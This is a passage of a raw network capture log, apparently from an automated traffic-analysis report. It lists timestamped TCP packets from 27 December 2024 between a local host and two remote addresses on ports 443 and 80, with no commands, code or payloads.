                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.814800978 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.814841032 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.814846992 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.816910982 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.816975117 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.817015886 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.817080975 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.834867001 CET49757443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:27.834877968 CET44349757150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:29.258476973 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:29.260521889 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:29.394284964 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:29.398612976 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:29.681674004 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:29.681710005 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:29.683850050 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:29.683881998 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:29.685986042 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:29.685997009 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:29.690239906 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:29.690253973 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.070667028 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.070698023 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.070719004 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.070741892 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.070768118 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.070784092 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.070792913 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.070816994 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.078680992 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.078710079 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.078725100 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.078754902 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.078783035 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.078813076 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.078857899 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.214375973 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.271085978 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.271116018 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.271157980 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.271179914 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.271195889 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.271223068 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.277400970 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.277429104 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.277545929 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.277571917 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.277664900 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.312525034 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.312556982 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.312645912 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.312686920 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.312697887 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.312756062 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.330570936 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.330600023 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.330650091 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.330668926 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.330682993 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.330713034 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.333822966 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.333913088 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.334574938 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.453943968 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.457547903 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.457571030 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.457622051 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.457633018 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.457693100 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.468463898 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.468494892 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.468555927 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.468575001 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.468609095 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.468658924 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.486516953 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.486536026 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.486603022 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.486617088 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.486660957 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.497765064 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.497783899 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.497862101 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.497869968 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.497911930 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.503403902 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.503422976 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.503494978 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.503504992 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.503554106 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.517319918 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.517335892 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.517398119 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.517405033 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.517466068 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.522962093 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.522979975 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.523045063 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.523057938 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.523108959 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.665312052 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.665354967 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.665400028 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.665420055 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.665467978 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.665498018 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.667929888 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.667952061 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.668031931 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.668055058 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.668219090 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.679227114 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.679248095 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.679297924 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.679308891 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.679342985 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.679354906 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.684156895 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.684190035 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.684246063 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.684252977 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.684279919 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.684319019 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.695348978 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.695368052 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.695436001 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.695449114 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.695498943 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.702847958 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.702864885 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.702931881 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.702939034 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.703053951 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.711529016 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.711544991 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.711673975 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.711688995 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.711981058 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.721695900 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.721714973 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.721796036 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.721802950 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.721846104 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.725526094 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.725542068 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.725615025 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.725642920 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.725684881 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.737967968 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.737987995 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.738048077 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.738059044 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.738086939 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.738111973 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.742868900 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.742889881 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.742954016 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.742980957 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.742999077 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.743026018 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.755449057 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.755470037 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.755521059 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.755530119 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.755563021 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.755593061 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.874636889 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.874660015 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.874741077 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.874762058 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.874782085 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.874809027 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.876954079 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.876990080 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.877051115 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.877062082 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.877082109 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.877095938 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.885451078 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.885468960 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.885529995 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.885548115 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.885564089 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.885723114 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.889466047 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.889482975 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.889597893 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.889606953 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.889661074 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.898102045 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.898118973 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.898160934 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.898175955 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.898190022 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.898238897 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.902956009 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.902980089 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.903026104 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.903031111 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.903069973 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.903090000 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.910826921 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.910845041 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.910907984 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.910917044 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.911056995 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.916563034 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.916579962 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.916671038 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.916676998 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.916699886 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.916738033 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.922564030 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.922580957 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.922652006 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.922662020 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.922703028 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.922765970 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.928359032 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.928385019 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.928414106 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.928419113 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.928452015 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.928463936 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.935297012 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.935318947 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.935363054 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.935372114 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.935405970 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.935427904 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.942779064 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.942799091 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.942842007 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.942850113 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.942899942 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.942925930 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.946173906 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.946190119 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.946254969 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.946264982 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.946309090 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.954606056 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.954636097 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.954678059 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.954684019 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.954706907 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.954744101 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.958679914 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.958695889 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.958769083 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.958776951 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.958825111 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.968039989 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.968059063 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.968115091 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.968122005 CET44349766150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.968151093 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.968169928 CET49766443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.086252928 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.086277008 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.086364985 CET49767443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.086411953 CET44349767150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.086471081 CET49767443192.168.2.6150.171.27.10
